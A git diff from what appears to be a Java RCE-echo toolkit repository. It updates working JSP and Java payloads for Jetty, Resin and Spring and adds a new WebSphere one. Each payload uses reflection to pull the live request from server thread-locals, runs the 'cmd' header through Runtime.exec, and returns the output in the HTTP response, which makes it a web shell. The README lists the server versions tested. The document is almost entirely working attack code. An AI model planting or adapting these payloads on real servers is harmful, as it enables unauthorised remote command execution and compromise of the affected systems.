diff --git a/Jetty/code/jetty789Echo.jsp b/Jetty/code/jetty789Echo.jsp
index 847e28e..4028bf4 100644
--- a/Jetty/code/jetty789Echo.jsp
+++ b/Jetty/code/jetty789Echo.jsp
@@ -24,14 +24,17 @@
 obj = method.invoke(connection, null);
 method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
- obj = method.invoke(obj, new Object[]{"cmd"});
+ String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
- printWriter.println(res);
+ method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
+ printWriter.println(res);
+ }
+ break;
 }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
 java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null);
 Object httpChannel = method.invoke(obj, null);
@@ -40,16 +43,19 @@
 obj = method.invoke(httpChannel, null);
 method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
- obj = method.invoke(obj, new Object[]{"cmd"});
-
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
-
- method = httpChannel.getClass().getMethod("getResponse", null);
- obj = method.invoke(httpChannel, null);
-
- method = obj.getClass().getMethod("getWriter", null);
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
- printWriter.println(res);
+ String cmd = (String)method.invoke(obj, new Object[]{"cmd"});
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ method = httpChannel.getClass().getMethod("getResponse", null);
+ obj = method.invoke(httpChannel, null);
+
+ method = obj.getClass().getMethod("getWriter", null);
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
+ printWriter.println(res);
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Jetty/code/jetty78Echo.jsp b/Jetty/code/jetty78Echo.jsp
index 6165920..cda8dbd 100644
--- a/Jetty/code/jetty78Echo.jsp
+++ b/Jetty/code/jetty78Echo.jsp
@@ -22,13 +22,16 @@
 obj = method.invoke(connection);
 method = obj.getClass().getMethod("getHeader", String.class);
- obj = method.invoke(obj, "cmd");
+ String cmd = (String)method.invoke(obj, "cmd");
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
+ method = connection.getClass().getMethod("getPrintWriter", String.class);
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
+ printWriter.println(res);
+ }
- method = connection.getClass().getMethod("getPrintWriter", String.class);
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
- printWriter.println(res);
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Jetty/code/jetty9Echo.jsp b/Jetty/code/jetty9Echo.jsp
index 67a0aff..9b5e807 100644
--- a/Jetty/code/jetty9Echo.jsp
+++ b/Jetty/code/jetty9Echo.jsp
@@ -24,16 +24,19 @@
 obj = method.invoke(httpChannel);
 method = obj.getClass().getMethod("getHeader", String.class);
- obj = method.invoke(obj, "cmd");
-
- String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
-
- method = httpChannel.getClass().getMethod("getResponse");
- obj = method.invoke(httpChannel);
-
- method = obj.getClass().getMethod("getWriter");
- java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
- printWriter.println(res);
+ String cmd = (String)method.invoke(obj, "cmd");
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ method = httpChannel.getClass().getMethod("getResponse");
+ obj = method.invoke(httpChannel);
+
+ method = obj.getClass().getMethod("getWriter");
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
+ printWriter.println(res);
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/README.md b/README.md
index 364af69..6dc3acc 100644
--- a/README.md
+++ b/README.md
@@ -5,7 +5,8 @@
 - [x] Windows通用回显
 - [x] Spring回显
 - [x] Tomcat通用回显 (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22)
-- [x] Weblogic
+- [x] Weblogic (Tested on 10.3.6.0, 12.1.3.0.0)
+- [x] Websphere (Tested on AppServer V8.5(8.5.5.18), AppServer V9.0(9.0.5.5))
 - [x] JBoss(Wildfly) (Testd on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1)
 - [x] Resin (Tested on pro-4.0.64, pro-4.0.57, pro-4.0.45, pro-4.0.32, failed on pro-3.1.15)
 - [x] Jetty (Tested on 9.4.30.v20200611, 9.3.28.v20191105, 9.2.29.v20191105, 9.0.7.v20131107, 8.1.21.v20160908, 7.6.21.v20160908,
diff --git a/Resin/code/resinEcho.jsp b/Resin/code/resinEcho.jsp
index d9a6b19..da00953 100644
--- a/Resin/code/resinEcho.jsp
+++ b/Resin/code/resinEcho.jsp
@@ -1,6 +1,6 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
- Class clazz = Thread.currentThread().getClass();
+ Class clazz = Thread.currentThread().getClass();
 java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
 field.setAccessible(true);
 Object obj = field.get(Thread.currentThread());
@@ -21,14 +21,19 @@
 if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
 com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
 String cmd = httpRequest.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
- httpResponse.setHeader("Content-Length", res.length() + "");
- java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
- method.setAccessible(true);
- com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
- httpResponseStream.write(res.getBytes(), 0, res.length());
- httpResponseStream.close();
+
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
+ httpResponse.setHeader("Content-Length", res.length() + "");
+ java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
+ method.setAccessible(true);
+ com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
+ httpResponseStream.write(res.getBytes(), 0, res.length());
+ httpResponseStream.close();
+ }
+
+ break;
 }
 }
 %>
\ No newline at end of file
diff --git a/Spring/code/SpringMVCTestController.java b/Spring/code/SpringMVCTestController.java
index 7552318..cd936d0 100644
--- a/Spring/code/SpringMVCTestController.java
+++ b/Spring/code/SpringMVCTestController.java
@@ -19,8 +19,10 @@ public User Test() throws IOException {
 javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
 String cmd = httprequest.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- httpresponse.getWriter().println(res);
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ httpresponse.getWriter().println(res);
+ }
 return new User();
 }
diff --git a/Spring/code/SpringWebFlowTestController.java b/Spring/code/SpringWebFlowTestController.java
index c6d73b9..82f13c6 100644
--- a/Spring/code/SpringWebFlowTestController.java
+++ b/Spring/code/SpringWebFlowTestController.java
@@ -26,8 +26,10 @@ public String test() throws IOException {
 javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse) servletExternalContext.getNativeResponse();
 String cmd = request.getHeader("cmd");
- String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
- response.getWriter().println(res);
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ response.getWriter().println(res);
+ }
 return "test";
 }
diff --git a/Websphere/README.md b/Websphere/README.md
new file mode 100644
index 0000000..6cfeb58
--- /dev/null
+++ b/Websphere/README.md
@@ -0,0 +1,5 @@
+# Websphere 回显
+
+## 效果
+![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/Websphere/img/001.png)
+
diff --git a/Websphere/code/websphereEcho.jsp b/Websphere/code/websphereEcho.jsp
new file mode 100644
index 0000000..b507eb7
--- /dev/null
+++ b/Websphere/code/websphereEcho.jsp
@@ -0,0 +1,28 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ Class clazz = Thread.currentThread().getClass();
+ java.lang.reflect.Field field = clazz.getDeclaredField("wsThreadLocals");
+ field.setAccessible(true);
+ Object obj = field.get(Thread.currentThread());
+
+ Object[] obj_arr = (Object[]) obj;
+ for(int i = 0; i < obj_arr.length; i++){
+ Object o = obj_arr[i];
+ if(o == null) continue;
+
+ if(o.getClass().getName().endsWith("WebContainerRequestState")){
+ Object req = o.getClass().getMethod("getCurrentThreadsIExtendedRequest", new Class[0]).invoke(o, new Object[0]);
+ Object resp = o.getClass().getMethod("getCurrentThreadsIExtendedResponse", new Class[0]).invoke(o, new Object[0]);
+
+ String cmd = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
+ if(cmd != null && !cmd.isEmpty()){
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+
+ java.io.PrintWriter printWriter = (java.io.PrintWriter)resp.getClass().getMethod("getWriter", new Class[0]).invoke(resp, new Object[0]);
+ printWriter.println(res);
+ }
+
+ break;
+ }
+ }
+%>
diff --git a/Websphere/img/001.png b/Websphere/img/001.png
new file mode 100644
index 0000000..e52c345
Binary files /dev/null and b/Websphere/img/001.png differ